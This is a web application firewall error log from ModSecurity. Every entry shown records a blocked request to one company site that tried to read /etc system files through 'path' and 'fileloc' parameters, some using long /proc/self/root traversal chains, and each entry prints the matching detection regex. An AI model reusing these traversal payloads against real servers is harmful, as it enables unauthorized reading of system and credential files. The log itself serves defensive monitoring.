[Fri Mar 20 09:23:13.657203 2026] [:error] [pid 21219:tid 140411607643904] [client 216.73.216.191:41504] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab08L_XLqtnMIWvjpaKrDAAAApA"]
[Fri Mar 20 09:23:16.198899 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.241.31:33550] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08NDJ3M9BSuKP7CAYvnAAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:17.715035 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:60690] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08NeoXxyEfFpUF8f-ReAAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:19.130184 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.241.31:60698] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08NzJ3M9BSuKP7CAYvogAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:20.635181 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.241.31:60700] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08OPqxLDW4GITHUkT6ugAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:21.311100 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:59454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08OeoXxyEfFpUF8f-RfQAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:23:21.975057 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.241.31:60716] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08ORCii7xarUs8iHZ4wQAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:22.763393 2026] [:error] [pid 7893:tid 140411574073088] [client 216.73.216.191:42240] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08OhCii7xarUs8iHZ4xAAAAhQ"]
[Fri Mar 20 09:23:23.433969 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.241.31:60730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08O_XLqtnMIWvjpaKrIwAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:24.177431 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.243.128:55304] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08PPXLqtnMIWvjpaKrJAAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:23:24.755175 2026] [:error] [pid 7893:tid 140411708356352] [client 216.73.216.191:42386] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08PBCii7xarUs8iHZ4ywAAAgQ"]
[Fri Mar 20 09:23:24.838542 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.241.31:60744] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08PF1pVZ5mVmJwsFNCSwAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:26.531423 2026] [:error] [pid 10189:tid 140411624429312] [client 216.73.216.191:42422] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08PTJ3M9BSuKP7CAYvpgAAAI4"]
[Fri Mar 20 09:23:26.542343 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.241.31:60750] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08PjJ3M9BSuKP7CAYvqwAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:28.224927 2026] [:error] [pid 31215:tid 140411725141760] [client 216.73.216.191:42558] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08QAF0L0L-SsrnPo55WAAAAsI"]
[Fri Mar 20 09:23:28.342957 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.241.31:33308] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08QBCii7xarUs8iHZ40wAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:29.851719 2026] [:error] [pid 10189:tid 140411632822016] [client 74.7.241.31:33318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08QTJ3M9BSuKP7CAYvuQAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:30.650890 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:55320] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08QjJ3M9BSuKP7CAYvuwAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:23:31.395475 2026] [:error] [pid 9818:tid 140411540502272] [client 74.7.241.31:33320] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08Q11pVZ5mVmJwsFNCWAAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:31.975306 2026] [:error] [pid 21219:tid 140411540502272] [client 216.73.216.191:42866] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08Q_XLqtnMIWvjpaKrKwAAApg"]
[Fri Mar 20 09:23:33.442776 2026] [:error] [pid 10189:tid 140411565680384] [client 74.7.241.31:33324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08RDJ3M9BSuKP7CAYvwwAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:34.958573 2026] [:error] [pid 10189:tid 140411565680384] [client 216.73.216.191:43002] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08RjJ3M9BSuKP7CAYvzQAAAJU"]
[Fri Mar 20 09:23:36.871872 2026] [:error] [pid 11642:tid 140411691570944] [client 74.7.241.31:33338] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08SLninkcc-iUj5ApvOgAAA4Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:23:38.550033 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.241.31:38092] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 